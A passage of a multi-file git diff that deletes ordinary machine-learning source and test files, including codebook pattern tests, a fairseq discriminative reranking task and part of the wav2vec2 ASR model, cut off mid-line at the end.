pattern: Pattern, special_token: float): - """Reference method to revert the logits from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, card, n_q, S = z.shape - assert pattern.n_q == n_q - ref_layout = pattern.layout - inp = torch.full((bs, card, pattern.n_q, pattern.timesteps), special_token, dtype=torch.float).numpy() - inp[:] = special_token - for s, v in enumerate(ref_layout[1:]): - if s < S: - for (t, q) in v: - if t < pattern.timesteps: - inp[:, :, q, t] = z[:, :, q, s] - return torch.from_numpy(inp) - - def _get_pattern_providers(self, n_q: int): - pattern_provider_1 = ParallelPatternProvider(n_q) - pattern_provider_2 = DelayedPatternProvider(n_q, list(range(n_q))) - pattern_provider_3 = DelayedPatternProvider(n_q, [0] + [1] * (n_q - 1)) - pattern_provider_4 = UnrolledPatternProvider( - n_q, flattening=list(range(n_q)), delays=[0] * n_q - ) - pattern_provider_5 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] * n_q - ) - pattern_provider_6 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] + [5] * (n_q - 1) - ) - return [ - pattern_provider_1, - pattern_provider_2, - pattern_provider_3, - pattern_provider_4, - pattern_provider_5, - pattern_provider_6, - ] - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_build_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # we can correctly build the sequence from the pattern - z = torch.randint(0, card, (bs, n_q, timesteps)) - ref_res = self.ref_build_pattern_sequence(z, pattern, special_token) - res, indexes, mask = pattern.build_pattern_sequence(z, special_token) - assert (res == ref_res).float().mean() == 1.0 - - # expected assertion fails on the number of timesteps - invalid_timesteps = [timesteps + 1] - if pattern.num_sequence_steps != pattern.timesteps: - invalid_timesteps.append(pattern.num_sequence_steps) - for i_timesteps in invalid_timesteps: - z2 = torch.randint(0, card, (bs, n_q, i_timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z2, special_token) - - # expected assertion fails on the number of codebooks - invalid_qs = [0, n_q - 1, n_q + 1] - for i_q in invalid_qs: - z3 = torch.randint(0, card, (bs, i_q, timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z3, special_token) - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_revert_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - ref_out = self.ref_revert_pattern_sequence(s, pattern, special_token) - # ensure our reference script retrieve the original sequence - assert z.shape == ref_out.shape - assert (z == ref_out).float().mean() == 1.0 - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_sequence(s, special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - @pytest.mark.parametrize("card", [1, 2, 256, 1024]) - def test_revert_pattern_logits(self, n_q: int, timesteps: int, card: int): - bs = 2 - special_token = card - logits_special_token = float('nan') - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - logits = torch.randn((bs, card, n_q, s.shape[-1])) - ref_out = self.ref_revert_pattern_logits(logits, pattern, logits_special_token) - # ensure our reference script retrieve the original sequence - assert ref_out.shape == torch.Size([bs, card, n_q, timesteps]) - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_logits(logits, logits_special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 diff --git a/spaces/Grezz/generate_human_motion/pyrender/tests/unit/test_egl.py b/spaces/Grezz/generate_human_motion/pyrender/tests/unit/test_egl.py deleted file mode 100644 index e2f4bef39e33c2794e6837b5a1bb127d8d4dba06..0000000000000000000000000000000000000000 --- a/spaces/Grezz/generate_human_motion/pyrender/tests/unit/test_egl.py +++ /dev/null @@ -1,16 +0,0 @@ -# from pyrender.platforms import egl - - -def tmp_test_default_device(): - egl.get_default_device() - - -def tmp_test_query_device(): - devices = egl.query_devices() - assert len(devices) > 0 - - -def tmp_test_init_context(): - device = egl.query_devices()[0] - platform = egl.EGLPlatform(128, 128, device=device) - platform.init_context() diff --git a/spaces/Hallucinate/demo/taming/modules/losses/__init__.py b/spaces/Hallucinate/demo/taming/modules/losses/__init__.py deleted file mode 100644 index d09caf9eb805f849a517f1b23503e1a4d6ea1ec5..0000000000000000000000000000000000000000 --- a/spaces/Hallucinate/demo/taming/modules/losses/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from taming.modules.losses.vqperceptual import DummyLoss - diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py deleted file mode 100644 index 0e7fbba888c1ddd118da8238d644b4ab571177ff..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py +++ /dev/null @@ -1,475 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from dataclasses import dataclass, field - -import itertools -import logging -import os - -import numpy as np -import torch - -from fairseq import metrics -from fairseq.data import ( - ConcatDataset, - ConcatSentencesDataset, - data_utils, - Dictionary, - IdDataset, - indexed_dataset, - NestedDictionaryDataset, - NumSamplesDataset, - NumelDataset, - PrependTokenDataset, - RawLabelDataset, - RightPadDataset, - SortDataset, - TruncateDataset, - TokenBlockDataset, -) -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.tasks import FairseqTask, register_task -from omegaconf import II, MISSING - - -EVAL_BLEU_ORDER = 4 -TARGET_METRIC_CHOICES = ChoiceEnum(["bleu", "ter"]) - -logger = logging.getLogger(__name__) - - -@dataclass -class DiscriminativeRerankingNMTConfig(FairseqDataclass): - data: str = field(default=MISSING, metadata={"help": "path to data directory"}) - num_data_splits: int = field( - default=1, metadata={"help": "total number of data splits"} - ) - no_shuffle: bool = field( - default=False, metadata={"help": "do not shuffle training data"} - ) - max_positions: int = field( - default=512, metadata={"help": "number of positional embeddings to learn"} - ) - include_src: bool = field( - default=False, metadata={"help": "include source sentence"} - ) - mt_beam: int = field(default=50, metadata={"help": "beam size of input hypotheses"}) - eval_target_metric: bool = field( - default=False, - metadata={"help": "evaluation with the target metric during validation"}, - ) - target_metric: TARGET_METRIC_CHOICES = field( - default="bleu", metadata={"help": "name of the target metric to optimize for"} - ) - train_subset: str = field( - default=II("dataset.train_subset"), - metadata={"help": "data subset to use for training (e.g. train, valid, test)"}, - ) - seed: int = field( - default=II("common.seed"), - metadata={"help": "pseudo random number generator seed"}, - ) - - -class RerankerScorer(object): - """Scores the target for a given (source (optional), target) input.""" - - def __init__(self, args, mt_beam): - self.mt_beam = mt_beam - - @torch.no_grad() - def generate(self, models, sample, **kwargs): - """Score a batch of translations.""" - net_input = sample["net_input"] - - assert len(models) == 1, "does not support model ensemble" - model = models[0] - - bs = net_input["src_tokens"].shape[0] - assert ( - model.joint_classification == "none" or bs % self.mt_beam == 0 - ), f"invalid batch size ({bs}) for joint classification with beam size ({self.mt_beam})" - - model.eval() - logits = model(**net_input) - - batch_out = model.sentence_forward(logits, net_input["src_tokens"]) - if model.joint_classification == "sent": - batch_out = model.joint_forward( - batch_out.view(self.mt_beam, bs // self.mt_beam, -1) - ) - scores = model.classification_forward( - batch_out.view(bs, 1, -1) - ) # input: B x T x C - - return scores - - -@register_task( - "discriminative_reranking_nmt", dataclass=DiscriminativeRerankingNMTConfig -) -class DiscriminativeRerankingNMTTask(FairseqTask): - """ - Translation rerank task. - The input can be either (src, tgt) sentence pairs or tgt sentence only. - """ - - cfg: DiscriminativeRerankingNMTConfig - - def __init__(self, cfg: DiscriminativeRerankingNMTConfig, data_dictionary=None): - super().__init__(cfg) - self.dictionary = data_dictionary - self._max_positions = cfg.max_positions - # args.tokens_per_sample = self._max_positions - # self.num_classes = 1 # for model - - @classmethod - def load_dictionary(cls, cfg, filename): - """Load the dictionary from the filename""" - dictionary = Dictionary.load(filename) - dictionary.add_symbol("") # for loading pretrained XLMR model - - return dictionary - - @classmethod - def setup_task(cls, cfg: DiscriminativeRerankingNMTConfig, **kwargs): - # load data dictionary (assume joint dictionary) - data_path = cfg.data - data_dict = cls.load_dictionary( - cfg, os.path.join(data_path, "input_src/dict.txt") - ) - - logger.info("[input] src dictionary: {} types".format(len(data_dict))) - - return DiscriminativeRerankingNMTTask(cfg, data_dict) - - def load_dataset(self, split, epoch=0, combine=False, **kwargs): - """Load a given dataset split (e.g., train, valid, test).""" - if self.cfg.data.endswith("1"): - data_shard = (epoch - 1) % self.cfg.num_data_splits + 1 - data_path = self.cfg.data[:-1] + str(data_shard) - else: - data_path = self.cfg.data - - def get_path(type, data_split): - return os.path.join(data_path, str(type), data_split) - - def make_dataset(type, dictionary, data_split, combine): - split_path = get_path(type, data_split) - - dataset = data_utils.load_indexed_dataset( - split_path, dictionary, combine=combine, - ) - return dataset - - def load_split(data_split, metric): - input_src = None - if self.cfg.include_src: - input_src = make_dataset( - "input_src", self.dictionary, data_split, combine=False - ) - assert input_src is not None, "could not find dataset: {}".format( - get_path("input_src", data_split) - ) - - input_tgt = make_dataset( - "input_tgt", self.dictionary, data_split, combine=False - ) - assert input_tgt is not None, "could not find dataset: {}".format( - get_path("input_tgt", data_split) - ) - - label_path = f"{get_path(metric, data_split)}.{metric}" - assert os.path.exists(label_path), f"could not find dataset: {label_path}" - - np_labels = np.loadtxt(label_path) - if self.cfg.target_metric == "ter": - np_labels = -np_labels - label = RawLabelDataset(np_labels) - - return input_src, input_tgt, label - - src_datasets = [] - tgt_datasets = [] - label_datasets = [] - - if split == self.cfg.train_subset: - for k in itertools.count(): - split_k = "train" + (str(k) if k > 0 else "") - prefix = os.path.join(data_path, "input_tgt", split_k) - if not indexed_dataset.dataset_exists(prefix, impl=None): - if k > 0: - break - else: - raise FileNotFoundError(f"Dataset not found: {prefix}") - input_src, input_tgt, label = load_split( - split_k, self.cfg.target_metric - ) - src_datasets.append(input_src) - tgt_datasets.append(input_tgt) - label_datasets.append(label) - else: - input_src, input_tgt, label = load_split(split, self.cfg.target_metric) - src_datasets.append(input_src) - tgt_datasets.append(input_tgt) - label_datasets.append(label) - - if len(tgt_datasets) == 1: - input_tgt, label = tgt_datasets[0], label_datasets[0] - if self.cfg.include_src: - input_src = src_datasets[0] - else: - input_tgt = ConcatDataset(tgt_datasets) - label = ConcatDataset(label_datasets) - if self.cfg.include_src: - input_src = ConcatDataset(src_datasets) - - input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions) - if self.cfg.include_src: - input_src = PrependTokenDataset(input_src, self.dictionary.bos()) - input_src = TruncateDataset(input_src, self.cfg.max_positions) - src_lengths = NumelDataset(input_src, reduce=False) - src_tokens = ConcatSentencesDataset(input_src, input_tgt) - else: - src_tokens = PrependTokenDataset(input_tgt, self.dictionary.bos()) - src_lengths = NumelDataset(src_tokens, reduce=False) - - dataset = { - "id": IdDataset(), - "net_input": { - "src_tokens": RightPadDataset( - src_tokens, pad_idx=self.source_dictionary.pad(), - ), - "src_lengths": src_lengths, - }, - "nsentences": NumSamplesDataset(), - "ntokens": NumelDataset(src_tokens, reduce=True), - "target": label, - } - - dataset = NestedDictionaryDataset(dataset, sizes=[src_tokens.sizes],) - - assert len(dataset) % self.cfg.mt_beam == 0, ( - "dataset size (%d) is not a multiple of beam size (%d)" - % (len(dataset), self.cfg.mt_beam) - ) - - # no need to shuffle valid/test sets - if not self.cfg.no_shuffle and split == self.cfg.train_subset: - - # need to keep all hypothese together - start_idx = np.arange(0, len(dataset), self.cfg.mt_beam) - with data_utils.numpy_seed(self.cfg.seed + epoch): - np.random.shuffle(start_idx) - - idx = np.arange(0, self.cfg.mt_beam) - shuffle = np.tile(idx, (len(start_idx), 1)).reshape(-1) + np.tile( - start_idx, (self.cfg.mt_beam, 1) - ).transpose().reshape(-1) - - dataset = SortDataset(dataset, sort_order=[shuffle],) - - logger.info(f"Loaded {split} with #samples: {len(dataset)}") - - self.datasets[split] = dataset - return self.datasets[split] - - def build_dataset_for_inference(self, src_tokens, src_lengths, **kwargs): - assert not self.cfg.include_src or len(src_tokens[0]) == 2 - input_src = None - if self.cfg.include_src: - input_src = TokenBlockDataset( - [t[0] for t in src_tokens], - [l[0] for l in src_lengths], - block_size=None, # ignored for "eos" break mode - pad=self.source_dictionary.pad(), - eos=self.source_dictionary.eos(), - break_mode="eos", - ) - input_src = PrependTokenDataset(input_src, self.dictionary.bos()) - input_src = TruncateDataset(input_src, self.cfg.max_positions) - - input_tgt = TokenBlockDataset( - [t[-1] for t in src_tokens], - [l[-1] for l in src_lengths], - block_size=None, # ignored for "eos" break mode - pad=self.source_dictionary.pad(), - eos=self.source_dictionary.eos(), - break_mode="eos", - ) - input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions) - if self.cfg.include_src: - src_tokens = ConcatSentencesDataset(input_src, input_tgt) - src_lengths = NumelDataset(input_src, reduce=False) - else: - input_tgt = PrependTokenDataset(input_tgt, self.dictionary.bos()) - src_tokens = input_tgt - src_lengths = NumelDataset(src_tokens, reduce=False) - - dataset = { - "id": IdDataset(), - "net_input": { - "src_tokens": RightPadDataset( - src_tokens, pad_idx=self.source_dictionary.pad(), - ), - "src_lengths": src_lengths, - }, - "nsentences": NumSamplesDataset(), - "ntokens": NumelDataset(src_tokens, reduce=True), - } - - return NestedDictionaryDataset(dataset, sizes=[src_tokens.sizes],) - - def build_model(self, cfg: FairseqDataclass): - return super().build_model(cfg) - - def build_generator(self, args): - return RerankerScorer(args, mt_beam=self.cfg.mt_beam) - - def max_positions(self): - return self._max_positions - - @property - def source_dictionary(self): - return self.dictionary - - @property - def target_dictionary(self): - return self.dictionary - - def create_dummy_batch(self, device): - dummy_target = ( - torch.zeros(self.cfg.mt_beam, EVAL_BLEU_ORDER * 2 + 3).long().to(device) - if not self.cfg.eval_ter - else torch.zeros(self.cfg.mt_beam, 3).long().to(device) - ) - - return { - "id": torch.zeros(self.cfg.mt_beam, 1).long().to(device), - "net_input": { - "src_tokens": torch.zeros(self.cfg.mt_beam, 4).long().to(device), - "src_lengths": torch.ones(self.cfg.mt_beam, 1).long().to(device), - }, - "nsentences": 0, - "ntokens": 0, - "target": dummy_target, - } - - def train_step( - self, sample, model, criterion, optimizer, update_num, ignore_grad=False - ): - if ignore_grad and sample is None: - sample = self.create_dummy_batch(model.device) - - return super().train_step( - sample, model, criterion, optimizer, update_num, ignore_grad - ) - - def valid_step(self, sample, model, criterion): - if sample is None: - sample = self.create_dummy_batch(model.device) - - loss, sample_size, logging_output = super().valid_step(sample, model, criterion) - - if not self.cfg.eval_target_metric: - return loss, sample_size, logging_output - - scores = logging_output["scores"] - - if self.cfg.target_metric == "bleu": - assert sample["target"].shape[1] == EVAL_BLEU_ORDER * 2 + 3, ( - "target does not contain enough information (" - + str(sample["target"].shape[1]) - + "for evaluating BLEU" - ) - - max_id = torch.argmax(scores, dim=1) - select_id = max_id + torch.arange( - 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam - ).to(max_id.device) - bleu_data = sample["target"][select_id, 1:].sum(0).data - - logging_output["_bleu_sys_len"] = bleu_data[0] - logging_output["_bleu_ref_len"] = bleu_data[1] - - for i in range(EVAL_BLEU_ORDER): - logging_output["_bleu_counts_" + str(i)] = bleu_data[2 + i] - logging_output["_bleu_totals_" + str(i)] = bleu_data[ - 2 + EVAL_BLEU_ORDER + i - ] - - elif self.cfg.target_metric == "ter": - assert sample["target"].shape[1] == 3, ( - "target does not contain enough information (" - + str(sample["target"].shape[1]) - + "for evaluating TER" - ) - - max_id = torch.argmax(scores, dim=1) - select_id = max_id + torch.arange( - 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam - ).to(max_id.device) - ter_data = sample["target"][select_id, 1:].sum(0).data - - logging_output["_ter_num_edits"] = -ter_data[0] - logging_output["_ter_ref_len"] = -ter_data[1] - - return loss, sample_size, logging_output - - def reduce_metrics(self, logging_outputs, criterion): - super().reduce_metrics(logging_outputs, criterion) - - if not self.cfg.eval_target_metric: - return - - def sum_logs(key): - return sum(log.get(key, 0) for log in logging_outputs) - - if self.cfg.target_metric == "bleu": - counts, totals = [], [] - for i in range(EVAL_BLEU_ORDER): - counts.append(sum_logs("_bleu_counts_" + str(i))) - totals.append(sum_logs("_bleu_totals_" + str(i))) - - if max(totals) > 0: - # log counts as numpy arrays -- log_scalar will sum them correctly - metrics.log_scalar("_bleu_counts", np.array(counts)) - metrics.log_scalar("_bleu_totals", np.array(totals)) - metrics.log_scalar("_bleu_sys_len", sum_logs("_bleu_sys_len")) - metrics.log_scalar("_bleu_ref_len", sum_logs("_bleu_ref_len")) - - def compute_bleu(meters): - import inspect - import sacrebleu - - fn_sig = inspect.getfullargspec(sacrebleu.compute_bleu)[0] - if "smooth_method" in fn_sig: - smooth = {"smooth_method": "exp"} - else: - smooth = {"smooth": "exp"} - bleu = sacrebleu.compute_bleu( - correct=meters["_bleu_counts"].sum, - total=meters["_bleu_totals"].sum, - sys_len=meters["_bleu_sys_len"].sum, - ref_len=meters["_bleu_ref_len"].sum, - **smooth, - ) - return round(bleu.score, 2) - - metrics.log_derived("bleu", compute_bleu) - elif self.cfg.target_metric == "ter": - num_edits = sum_logs("_ter_num_edits") - ref_len = sum_logs("_ter_ref_len") - - if ref_len > 0: - metrics.log_scalar("_ter_num_edits", num_edits) - metrics.log_scalar("_ter_ref_len", ref_len) - - def compute_ter(meters): - score = meters["_ter_num_edits"].sum / meters["_ter_ref_len"].sum - return round(score.item(), 2) - - metrics.log_derived("ter", compute_ter) diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/models/wav2vec/wav2vec2_asr.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/models/wav2vec/wav2vec2_asr.py deleted file mode 100644 index eb5d819da5121a243e345b3812292ef0b13ccf98..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/models/wav2vec/wav2vec2_asr.py +++ /dev/null @@ -1,664 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from argparse import Namespace -import contextlib -import copy -import math -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from dataclasses import dataclass, field -from omegaconf import MISSING, II, open_dict -from typing import Any, Optional - -from fairseq import checkpoint_utils, tasks, utils -from fairseq.dataclass import FairseqDataclass -from fairseq.dataclass.utils import convert_namespace_to_omegaconf -from fairseq.tasks import FairseqTask -from fairseq.models import ( - BaseFairseqModel, - FairseqEncoder, - FairseqEncoderDecoderModel, - FairseqIncrementalDecoder, - register_model, -) -from fairseq.models.wav2vec.wav2vec2 import MASKING_DISTRIBUTION_CHOICES -from fairseq.modules import ( - LayerNorm, - PositionalEmbedding, - TransformerDecoderLayer, -) - - -@dataclass -class Wav2Vec2AsrConfig(FairseqDataclass): - w2v_path: str = field( - default=MISSING, metadata={"help": "path to wav2vec 2.0 model"} - ) - no_pretrained_weights: bool = field( - default=False, metadata={"help": "if true, does not load pretrained weights"} - ) - dropout_input: float = field( - default=0.0, - metadata={"help": "dropout to apply to the input (after feat extr)"}, - ) - final_dropout: float = field( - default=0.0, - metadata={"help": "dropout after transformer and before final projection"}, - ) - dropout: float = field( - default=0.0, metadata={"help": "dropout probability inside wav2vec 2.0 model"} - ) - attention_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability for attention weights inside wav2vec 2.0 model" - }, - ) - activation_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability after activation in FFN inside wav2vec 2.0 model" - }, - ) - conv_feature_layers: Optional[str] = field( - default="[(512, 10, 5)] + [(512, 3, 2)] * 4 + [(512,2,2)] + [(512,2,2)]", - metadata={ - "help": ( - "string describing convolutional feature extraction " - "layers in form of a python list that contains " - "[(dim, kernel_size, stride), ...]" - ), - }, - ) - encoder_embed_dim: Optional[int] = field( - default=768, metadata={"help": "encoder embedding dimension"} - ) - - # masking - apply_mask: bool = field( - default=False, metadata={"help": "apply masking during fine-tuning"} - ) - mask_length: int = field( - default=10, metadata={"help": "repeat the mask indices multiple times"} - ) - mask_prob: float = field( - default=0.5, - metadata={ - "help": "probability of replacing a token with mask (normalized by length)" - }, - ) - mask_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", metadata={"help": "how to choose masks"} - ) - mask_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indices" - }, - ) - no_mask_overlap: bool = field( - default=False, metadata={"help": "whether to allow masks to overlap"} - ) - mask_min_space: Optional[int] = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - - # channel masking - mask_channel_length: int = field( - default=10, metadata={"help": "length of the mask for features (channels)"} - ) - mask_channel_prob: float = field( - default=0.0, metadata={"help": "probability of replacing a feature with 0"} - ) - mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", - metadata={"help": "how to choose mask length for channel masking"}, - ) - mask_channel_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indicesh" - }, - ) - no_mask_channel_overlap: bool = field( - default=False, metadata={"help": "whether to allow channel masks to overlap"} - ) - freeze_finetune_updates: int = field( - default=0, metadata={"help": "dont finetune wav2vec for this many updates"} - ) - feature_grad_mult: float = field( - default=0.0, metadata={"help": "reset feature grad mult in wav2vec 2.0 to this"} - ) - layerdrop: float = field( - default=0.0, metadata={"help": "probability of dropping a layer in wav2vec 2.0"} - ) - mask_channel_min_space: Optional[int] = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - mask_channel_before: bool = False - normalize: bool = II("task.normalize") - data: str = II("task.data") - # this holds the loaded wav2vec args - w2v_args: Any = None - - -@dataclass -class Wav2Vec2CtcConfig(Wav2Vec2AsrConfig): - blank_weight: float = 0 - blank_mode: str = "add" - - -@register_model("wav2vec_ctc", dataclass=Wav2Vec2CtcConfig) -class Wav2VecCtc(BaseFairseqModel): - def __init__(self, cfg: Wav2Vec2CtcConfig, w2v_encoder: BaseFairseqModel): - super().__init__() - self.cfg = cfg - self.w2v_encoder = w2v_encoder - self.blank_weight = cfg.blank_weight - self.blank_mode = cfg.blank_mode - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - return state_dict - - @classmethod - def build_model(cls, cfg: Wav2Vec2CtcConfig, task: FairseqTask): - """Build a new model instance.""" - w2v_encoder = Wav2VecEncoder(cfg, len(task.target_dictionary)) - return cls(cfg, w2v_encoder) - - def get_logits(self, net_output, normalize=False): - logits = net_output["encoder_out"] - if self.blank_weight != 0: - if self.blank_mode == "add": - logits[..., 0] += self.blank_weight - elif self.blank_mode == "set": - logits[..., 0] = self.blank_weight - else: - raise Exception(f"invalid blank mode {self.blank_mode}") - - if net_output["padding_mask"] is not None and net_output["padding_mask"].any(): - logits[net_output["padding_mask"].T][..., 0] = float("inf") - logits[net_output["padding_mask"].T][..., 1:] = float("-inf") - - if normalize: - logits = utils.log_softmax(logits.float(), dim=-1) - - return logits - - def get_normalized_probs(self, net_output, log_probs): - """Get normalized probabilities (or log probs) from a net's output.""" - - logits = self.get_logits(net_output) - - if log_probs: - return utils.log_softmax(logits.float(), dim=-1) - else: - return utils.softmax(logits.float(), dim=-1) - - def forward(self, **kwargs): - x = self.w2v_encoder(**kwargs) - return x - - -@dataclass -class Wav2Vec2Seq2SeqConfig(Wav2Vec2AsrConfig): - decoder_embed_dim: int = field( - default=768, metadata={"help": "decoder embedding dimension"} - ) - decoder_ffn_embed_dim: int = field( - default=3072, metadata={"help": "decoder embedding dimension for FFN"} - ) - decoder_layers: int = field(default=6, metadata={"help": "num of decoder layers"}) - decoder_layerdrop: float = field( - default=0.0, metadata={"help": "decoder layerdrop chance"} - ) - decoder_attention_heads: int = field( - default=4, metadata={"help": "num decoder attention heads"} - ) - decoder_learned_pos: bool = field( - default=False, - metadata={"help": "use learned positional embeddings in the decoder"}, - ) - decoder_normalize_before: bool = field( - default=False, metadata={"help": "apply layernorm before each decoder block"} - ) - no_token_positional_embeddings: bool = field( - default=False, - metadata={ - "help": "if set, disables positional embeddings (outside self attention)" - }, - ) - decoder_dropout: float = field( - default=0.0, metadata={"help": "dropout probability in the decoder"} - ) - decoder_attention_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability for attention weights inside the decoder" - }, - ) - decoder_activation_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability after activation in FFN inside the decoder" - }, - ) - max_target_positions: int = field( - default=2048, metadata={"help": "max target positions"} - ) - share_decoder_input_output_embed: bool = field( - default=False, metadata={"help": "share decoder input and output embeddings"} - ) - autoregressive: bool = II("task.autoregressive") - - -@register_model("wav2vec_seq2seq", dataclass=Wav2Vec2Seq2SeqConfig) -class Wav2Vec2Seq2SeqModel(FairseqEncoderDecoderModel): - def __init__(self, encoder, decoder): - super().__init__(encoder, decoder) - - @classmethod - def build_model(cls, cfg: Wav2Vec2Seq2SeqConfig, task: FairseqTask): - """Build a new model instance.""" - - assert ( - cfg.autoregressive - ), "Please set task.autoregressive=true for seq2seq asr models" - - src_dict, tgt_dict = task.source_dictionary, task.target_dictionary - - def build_embedding(dictionary, embed_dim): - num_embeddings = len(dictionary) - padding_idx = dictionary.pad() - emb = Embedding(num_embeddings, embed_dim, padding_idx) - return emb - - decoder_embed_tokens = build_embedding(tgt_dict, cfg.decoder_embed_dim) - - encoder = cls.build_encoder(cfg) - decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens) - - return Wav2Vec2Seq2SeqModel(encoder, decoder) - - @classmethod - def build_encoder(cls, cfg: Wav2Vec2AsrConfig): - return Wav2VecEncoder(cfg) - - @classmethod - def build_decoder(cls, cfg: Wav2Vec2Seq2SeqConfig, tgt_dict, embed_tokens): - return TransformerDecoder(cfg, tgt_dict, embed_tokens) - - def forward(self, **kwargs): - encoder_out = self.encoder(**kwargs) - decoder_out = self.decoder(encoder_out=encoder_out, **kwargs) - return decoder_out - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - return state_dict - - -class Wav2VecEncoder(FairseqEncoder): - def __init__(self, cfg: Wav2Vec2AsrConfig, output_size=None): - self.apply_mask = cfg.apply_mask - - arg_overrides = { - "dropout": cfg.dropout, - "activation_dropout": cfg.activation_dropout, - "dropout_input": cfg.dropout_input, - "attention_dropout": cfg.attention_dropout, - "mask_length": cfg.mask_length, - "mask_prob": cfg.mask_prob, - "mask_selection": cfg.mask_selection, - "mask_other": cfg.mask_other, - "no_mask_overlap": cfg.no_mask_overlap, - "mask_channel_length": cfg.mask_channel_length, - "mask_channel_prob": cfg.mask_channel_prob, - "mask_channel_before": cfg.mask_channel_before, - "mask_channel_selection": cfg.mask_channel_selection, - "mask_channel_other": cfg.mask_channel_other, - "no_mask_channel_overlap": cfg.no_mask_channel_overlap, - "encoder_layerdrop": cfg.layerdrop, - "feature_grad_mult": cfg.feature_grad_mult, - } - - if cfg.w2v_args is None: - state = checkpoint_utils.load_checkpoint_to_cpu(cfg.w2v_path, arg_overrides) - w2v_args = state.get("cfg", None) - if w2v_args is None: - w2v_args = convert_namespace_to_omegaconf(state["args"]) - w2v_args.criterion = None - w2v_args.lr_scheduler = None - cfg.w2v_args = w2v_args - else: - state = None - w2v_args = cfg.w2v_args - if isinstance(w2v_args, Namespace): - cfg.w2v_args = w2v_args = convert_namespace_to_omegaconf(w2v_args) - - assert cfg.normalize == w2v_args.task.normalize, ( - "Fine-tuning works best when data normalization is the same. " - "Please check that --normalize is set or unset for both pre-training and here" - ) - - w2v_args.task.data = cfg.data - task = tasks.setup_task(w2v_args.task) - model = task.build_model(w2v_args.model) - - if state is not None and not cfg.no_pretrained_weights: - model.load_state_dict(state["model"], strict=True) - - model.remove_pretraining_modules() - - super().__init__(task.source_dictionary) - - d = w2v_args.model.encoder_embed_dim - - self.w2v_model = model - - self.final_dropout = nn.Dropout(cfg.final_dropout) - self.freeze_finetune_updates = cfg.freeze_finetune_updates - self.num_updates = 0 - - targ_d = None - self.proj = None - - if output_size is not None: - targ_d = output_size - elif getattr(cfg, "decoder_embed_dim", d) != d: - targ_d = cfg.decoder_embed_dim - - if targ_d is not None: - self.proj = Linear(d, targ_d) - - def set_num_updates(self, num_updates): - """Set the number of parameters updates.""" - super().set_num_updates(num_updates) - self.num_updates = num_updates - - def forward(self, source, padding_mask, **kwargs): - - w2v_args = { - "source": source, - "padding_mask": padding_mask, - "mask": self.apply_mask and self.training, - } - - ft = self.freeze_finetune_updates <= self.num_updates - - with torch.no_grad() if not ft else contextlib.ExitStack(): - res = self.w2v_model.extract_features(**w2v_args) - - x = res["x"] - padding_mask = res["padding_mask"] - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - x = 